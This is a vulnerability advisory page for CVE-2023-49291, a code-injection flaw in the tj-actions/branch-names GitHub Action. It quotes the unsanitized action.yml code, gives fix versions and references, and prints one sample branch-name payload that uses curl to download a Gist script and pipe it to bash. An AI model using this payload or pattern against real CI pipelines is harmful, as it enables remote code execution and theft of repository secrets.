CVE-2023-49291: Improper Sanitization of Branch Name Leads to Arbitrary Code Injection
First published: Mon Dec 04 2023(Updated: )
### Summary The `tj-actions/branch-names` GitHub Actions references the `github.event.pull_request.head.ref` and `github.head_ref` context variables within a GitHub Actions `run` step. The head ref variable is the branch name and can be used to execute arbitrary code using a specially crafted branch name. ### Details The vulnerable code is within the `action.yml` file the `run` step references the value directly, instead of a sanitized variable. ```yml runs: using: "composite" steps: - id: branch run: | # "Set branch names..." if [[ "${{ github.ref }}" != "refs/tags/"* ]]; then BASE_REF=$(printf "%q" "${{ github.event.pull_request.base.ref || github.base_ref }}") HEAD_REF=$(printf "%q" "${{ github.event.pull_request.head.ref || github.head_ref }}") REF=$(printf "%q" "${{ github.ref }}") ``` An attacker can use a branch name to inject arbitrary code, for example: `Test")${IFS}&&${IFS}{curl,-sSfL,gist.githubusercontent.com/RampagingSloth/72511291630c7f95f0d8ffabb3c80fbf/raw/inject.sh}${IFS}|${IFS}bash&&echo${IFS}$("foo` will download and run a script from a Gist. This allows an attacker to inject a payload of arbitrary complexity. ### Impact An attacker can use this vulnerability to steal secrets from or abuse `GITHUB_TOKEN` permissions. ### Reference - https://securitylab.github.com/research/github-actions-untrusted-input
Credit: security-advisories@github.com security-advisories@github.com
| Affected Software | Affected Version | How to fix |
|---|---|---|
| actions/tj-actions/branch-names | <7.0.7 | 7.0.7 |
| Tj-actions Branch-names | <7.0.0 | |
| Tj-actions Branch-names | >=7.0.1<7.0.7 |
Never miss a vulnerability like this again
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
Reference Links
- https://github.com/tj-actions/branch-names/security/advisories/GHSA-8v8w-v8xg-79rf
- https://nvd.nist.gov/vuln/detail/CVE-2023-49291
- https://github.com/tj-actions/branch-names/commit/4923d1ca41f928c24f1c1b3af9daaadfb71e6337
- https://github.com/tj-actions/branch-names/commit/6c999acf206f5561e19f46301bb310e9e70d8815
- https://github.com/tj-actions/branch-names/commit/726fe9ba5e9da4fcc716223b7994ffd0358af060
- https://securitylab.github.com/research/github-actions-untrusted-input
- https://github.com/advisories/GHSA-8v8w-v8xg-79rf (Advisory)
Frequently Asked Questions
What is the severity of CVE-2023-49291?
The severity of CVE-2023-49291 is critical with a CVSS score of 9.3.
How does CVE-2023-49291 impact the affected software?
CVE-2023-49291 allows for arbitrary code injection in the `tj-actions/branch-names` GitHub Actions package with versions up to and excluding 7.0.7.
How can I fix CVE-2023-49291?
To fix CVE-2023-49291, upgrade to version 7.0.7 or above of the `tj-actions/branch-names` GitHub Actions package.
What is the Common Weakness Enumeration (CWE) for CVE-2023-49291?
The CWE for CVE-2023-49291 is CWE-20: Improper Input Validation.
Where can I find more information about CVE-2023-49291?
More information about CVE-2023-49291 can be found in the GitHub Security Advisory [GHSA-8v8w-v8xg-79rf](https://github.com/tj-actions/branch-names/security/advisories/GHSA-8v8w-v8xg-79rf).
- collector/github-advisory-latest
- alias/GHSA-8v8w-v8xg-79rf
- alias/CVE-2023-49291
- collector/nvd-api
- collector/nvd-cve
- collector/github-advisory
- agent/author
- agent/type
- agent/softwarecombine
- agent/first-publish-date
- collector/mitre-cve
- source/MITRE
- agent/remedy
- agent/last-modified-date
- agent/references
- agent/weakness
- agent/severity
- agent/title
- agent/description
- agent/event
- agent/trending
- agent/tags
- agent/source
- package-manager/actions
- vendor/tj-actions
- canonical/tj-actions branch-names
- version/tj-actions branch-names/7.0.1